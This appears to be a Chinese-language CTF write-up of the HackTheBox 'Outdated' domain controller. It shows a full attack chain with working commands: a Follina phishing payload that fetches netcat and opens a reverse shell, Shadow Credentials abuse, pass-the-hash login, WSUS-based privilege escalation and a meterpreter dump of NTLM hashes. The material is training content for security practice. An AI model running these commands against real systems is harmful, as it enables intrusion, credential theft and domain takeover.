基本信息

端口扫描

windows域环境,没有web:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
$ nmap -sC -sV -Pn 10.10.11.175
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-29 13:42 CST
Nmap scan report for 10.10.11.175
Host is up (0.20s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-29 12:44:47Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-29T12:46:12+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
|_ssl-date: 2022-08-29T12:46:12+00:00; +7h00m01s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-29T12:46:12+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-29T12:46:11+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-08-29T12:45:31
|_  start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 249.36 seconds

enum4linux

也没什么信息

1
2
3
4
5
6
sudo enum4linux 10.10.11.175

...
Domain Name: OUTDATED
Domain Sid: S-1-5-21-4089647348-67660539-4016542185
...

SMB

smb可以发现一些信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ smbclient -N -L 10.10.11.175

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Shares          Disk
	SYSVOL          Disk      Logon server share
	UpdateServicesPackages Disk      A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
	WsusContent     Disk      A network share to be used by Local Publishing to place published content on this WSUS system.
	WSUSTemp        Disk      A network share used by Local Publishing from a Remote WSUS Console Instance.
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

share

share目录里得到一个pdf:

1
2
3
4
5
6
7
8
9
10
└─$ smbclient -N //10.10.11.175/Shares
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jun 20 23:01:33 2022
  ..                                  D        0  Mon Jun 20 23:01:33 2022
  NOC_Reminder.pdf                   AR   106977  Mon Jun 20 23:00:32 2022

		9116415 blocks of size 4096. 1578569 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (74.5 KiloBytes/sec) (average 74.5 KiloBytes/sec)

NOC_Reminder.pdf

pdf里给出了一个邮箱地址和一些未修复的漏洞编号,“把任何内部网络应用的链接发到itsupport@outdated.htb,这样我们就可以把它们重新添加到我们的监控平台,以便发出警报和通知”,大概是这个意思,也就是说我们发送的链接会被自动点开,然后未修复的漏洞里大大的MSDT:

SMTP + follina

生成恶意文件,发送邮件:

代码需要稍微改一下:

1
command = f"""Invoke-WebRequest http://<your-ip>/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe <your-ip> {args.reverse}"""

然后运行,生成恶意文件,作为附件发送邮件

1
2
3
4
5
6
python3 follina.py -i 10.10.14.12 --port 80 --reverse 4444

# 用于提供nc64.exe
python3 -m http.server 7777

swaks --to itsupport@outdated.htb --from miao@miao.com --server 10.10.11.175 --body "http://10.10.14.12/"

机器不稳定,这里可能需要多次重置,最终得到btables用户shell

BloodHound

上传sharphound收集信息,下载下来分析

1
2
3
4
5
6
7
8
# download SharpHound to the target
> certutil.exe -urlcache -f http://10.10.14.12:7778/SharpHound.exe SharpHound.exe

# run SharpHound
> SharpHound.exe -c All --zipfilename output.zip

# send the result back
> nc.exe 10.10.14.12 5555 < output.zip

分析输出发现 btables 属于组 itstaff,并且 itstaff 有权将AddKeyCredentialLink 链接到对 DC具有psremote 访问权限的用户 sflowers

Shadow Credentials

根据bloodhound提示信息一步步来,首先需要利用Shadow Credentials得到sflower:

基本上,我们可以为用户 sflowers添加新属性,因此,我们可以添加一个新属性作为用户 sflowers 进行身份验证的有效凭证,然后我们可以使用我们创建的新凭证来拉取sflowers 的 TGT,我们可以作为 sflowers 用于持久访问

需要用到的工具,其中Whisker可以从这个文件中提取:

按照资料中的步骤,一步步来:

1
2
3
4
5
6
# 添加属性,得到rubeus命令
Whisker.exe add /target:sflowers

# 运行上面得到的rubeus命令,获取sflowers的TGT
# 得到的hash可以作为sflowers的NTLM hash
       NTLM              : 1FCDB1F6015DCB318CC77BB2BDA14DB5

sflowers & user flag

然后就可以直接使用得到的hash登录sflowers用户,桌面得到user flag:

1
evil-winrm -i 10.10.11.175 -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5

提权信息

运行winpeas,发现可能利用的WSUS:

检查确认满足利用条件,一个非https的wsus服务器,UseWUServer值为1,机器容易受到wsus攻击。

1
2
3
4
5
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
    WUServer    REG_SZ    http://wsus.outdated.htb:8530

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
    UseWUServer    REG_DWORD    0x1

提权 & root flag

利用WSUS执行任意命令,例如修改管理员密码:

1
2
3
4
5
6
7
8
# 创建更新
SharpWSUS.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \"net user Administrator Password123! \"" /title:"miaomiao"

# 批准更新
SharpWSUS.exe approve /updateid:ca649c3a-8069-4785-99ac-63cc85102856 /computername:dc.outdated.htb /groupname:"miao2group"

# 检查安装状态
SharpWSUS.exe check /updateid:ca649c3a-8069-4785-99ac-63cc85102856 /computername:dc.outdated.htb

然后就可以使用修改后的密码登录:

root flag

桌面得到root.txt:

Hashdump

这里716f1ce2e2cf38ee1210cce35eb78cb6是原本的hash,并不是我修改后的密码hash:

1
2
3
4
5
6
7
8
9
10
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:716f1ce2e2cf38ee1210cce35eb78cb6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a300e4031093085c7af7ac61a79e6d00:::
btables:1106:aad3b435b51404eeaad3b435b51404ee:781444163f086fdf8de13de9110ed6e7:::
sflowers:1108:aad3b435b51404eeaad3b435b51404ee:1fcdb1f6015dcb318cc77bb2bda14db5:::
WSUSDemo:18603:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
miao:18604:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:3edb0179378edc150d5952a94e29c074:::
CLIENT$:1105:aad3b435b51404eeaad3b435b51404ee:23358e899097bea6bf261c56105ab894:::

参考资料